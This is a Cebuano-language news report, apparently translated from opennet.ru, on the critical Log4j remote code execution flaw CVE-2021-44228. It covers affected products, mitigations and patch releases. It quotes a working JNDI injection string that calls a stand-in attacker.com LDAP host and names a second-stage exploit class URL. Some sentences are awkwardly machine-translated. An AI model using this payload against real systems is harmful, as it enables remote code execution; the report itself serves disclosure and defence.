Usa ka kritikal nga kahuyangan ang nadiskobrehan sa Apache Log4j, usa ka sikat nga logging framework para sa mga aplikasyon sa Java, nga nagtugot sa arbitraryong pagpatuman sa code kung magsulat og espesyal nga gihimo nga kantidad sa format nga "{jndi:URL}" ngadto sa log. Ang pag-atake mahimong himuon sa mga aplikasyon sa Java nga nag-log sa mga kantidad nga nakuha gikan sa mga eksternal nga gigikanan, pananglitan, kung magpakita sa mga problematikong kantidad sa mga mensahe sa sayup.
Namatikdan nga ang isyu nakaapekto sa halos tanang proyekto nga naggamit og mga framework sama sa Apache Struts, Apache Solr, Apache Druid, o Apache Flink, lakip na ang Steam, Apple iCloud, ug Minecraft clients ug servers. Ang kahuyangan gilauman nga mosangpot sa sunod-sunod nga mga pag-atake sa mga corporate application, nga magsubli sa kasaysayan sa mga kritikal nga kahuyangan sa Apache Struts framework, nga gibanabana nga gigamit sa mga web application sa 65% sa mga Fortune 100 nga kompanya. Narekord na ang mga pagsulay sa pag-scan sa network para sa mga mahuyang nga sistema.
Ang problema gipasamot pa sa kamatuoran nga ang usa ka nagtrabaho nga exploit napublikar na, apan ang mga pag-ayo alang sa mga stable nga sanga wala pa maporma. Ang usa ka CVE identifier wala pa ma-assign. Ang pag-ayo gilakip lamang sa log4j-2.15.0-rc1 testing branch. Isip solusyon, girekomenda ang pagbutang sa log4j2.formatMsgNoLookups parameter ngadto sa true.
Ang problema gipahinabo sa suporta sa log4j para sa pagproseso sa mga espesyal nga maskara nga "{}" sa mga linya sa log, nga magamit sa paghimo sa mga pangutana sa JNDI (Java Naming and Directory Interface). Ang pag-atake nag-agad sa pagpasa sa usa ka string nga adunay substitusyon nga "${jndi:ldap://attacker.com/a}", nga, kung maproseso, ang log4j magpadala server Pangutana sa LDAP sa attacker.com para sa agianan sa klase sa Java. Gibalik server Ang agianan sa tig-atake (pananglitan http://second-stage.attacker.com/Exploit.class) ikarga ug ipatuman subay sa konteksto sa kasamtangang proseso, nga magtugot sa tig-atake sa pagpatuman sa arbitraryong code sa sistema nga adunay mga pribilehiyo sa kasamtangang aplikasyon.
Supplement 1: Ang kahuyangan gi-assign sa identifier nga CVE-2021-44228.
Update 2: Usa ka solusyon para sa proteksyon nga gidugang sa log4j-2.15.0-rc1 ang nakit-an. Usa ka bag-ong update, ang log4j-2.15.0-rc2, nga adunay mas komprehensibo nga mga proteksyon batok sa kahuyangan ang gisugyot. Usa ka pagbag-o sa code ang gipasiugda nga makapugong sa mga pag-crash kung mogamit sa dili husto nga na-format nga JNDI URL.
Source: opennet.ru
